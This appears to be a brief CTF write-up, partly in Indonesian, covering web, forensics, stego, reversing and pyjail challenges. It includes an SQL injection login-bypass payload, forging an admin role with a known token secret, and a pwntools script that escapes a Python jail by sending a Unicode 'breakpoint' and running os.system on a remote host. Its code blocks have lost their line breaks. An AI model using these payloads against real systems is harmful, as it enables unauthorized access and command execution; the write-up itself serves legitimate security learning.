tinggal edit rolesnya dgn secret your_secret gnti jadi admin
login-dulu
concept: sqli we must suply username admin and bypass the password
Username: admin Password: " union select rootpage, type, name from sqlite_master --
reff :
bagas-dribble
concept: basic stego
tinggal strings nemu flagnya
file kosong
foren/file kosong
concept : finding pattern
s ="""Hex FIlenya taruh sini"""s = s.replace('E2 80 83', '0').replace('20', '1').replace(' ', '')for i inrange(0, len(s), 8):print(chr(int(s[i:i+8], 2)), end='')
image cropper
concept : recover image from wav lsb decoding
import argparsefrom PIL import Imageimport numpy as npimport scipy.io.wavfile as wavfileimport base64defrestore_image(wav_input_path):# Read the WAV file sample_rate, audio_signal = wavfile.read(wav_input_path)# Extract red, green, and blue channels from the audio signal red_channel = audio_signal[::3] green_channel = audio_signal[1::3] blue_channel = audio_signal[2::3]# Reshape and normalize the channels red_channel = ((red_channel +1) /2*255).astype(np.uint8) green_channel = ((green_channel +1) /2*255).astype(np.uint8) blue_channel = ((blue_channel +1) /2*255).astype(np.uint8)# Combine channels to reconstruct the image image_size =int(np.sqrt(len(red_channel))) image_data = np.column_stack((red_channel, green_channel, blue_channel)).reshape((image_size, image_size, 3))# Save the image restored_image = Image.fromarray(image_data, 'RGB') pixels =list(restored_image.getdata())# pixelss = []# for i in range(len(pixels)):# pixelss.append((pixels[i][0]+1,pixels[i][1]+1,pixels[i][1]+2)) x ="" cc =0for i in pixels:if i[0]==11and i[0]%2==1: x +="0"elif i[0]==13and i[0]%2==1: x+="1"else: x+="1"if i[1]==11and i[1]%2==1: x+="0"elif i[1]==12and i[1]%2==1: x+="1"else: x+="1"if i[2]==12and i[2]%2==0: x+="0"elif i[2]==14and i[2]%2==0: x+="1"else: x+="1"if cc ==250:print(x) cc+=1print("Image restored successfully!")if__name__=="__main__":restore_image("encoded.wav")
is_this_python
concept : reversing pyc
# Define a keykey ='2024'+'findit'# Initialize an empty list to store the encoded flagflag_enc = [113,100,116,79,4,89,2,80,54,66,83,92,3,107,8,80,9,11,54,16,93,1,83,90,82,7,49,80,80,71,10,1,1,73]# Initialize an empty list to store the key characterskey_arr = []# Extract characters from the key and append their ASCII values to key_arrfor character in key: character =ord(character) key_arr.append(character)# Initialize an empty list to store the flag in decimal formflag_arr = []# Convert hexadecimal values to decimal and append them to flag_arrfor hex_val in flag_enc: hex_val =int(hex_val) flag_arr.append(hex_val)# Extend key_arr if its length is less than flag_arrwhilelen(flag_arr)>len(key_arr): key_arr.extend(key_arr)# Initialize an empty list to store the flag in decimal form after XOR operationflag_dec = []# Perform XOR operation between corresponding elements of key_arr and flag_arrfor k, f inzip(key_arr, flag_arr): xored = k ^ f flag_dec.append(xored)# Convert the decimal values to text charactersflag_dec_text =''.join(map(chr, flag_dec))# Print the resultprint(flag_dec_text)
your-journey
concept : pyjail restriction bypass using unique char
from pwn import*context.log_level="ERROR"io =remote("103.191.63.187", 1337)# Change IP and PORTio.sendlineafter(b"$ ", '𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵'.encode())io.sendlineafter(b"(Pdb) ",b"import os;os.system('grep -ra \"FindIT\"')")print(io.recv().decode())
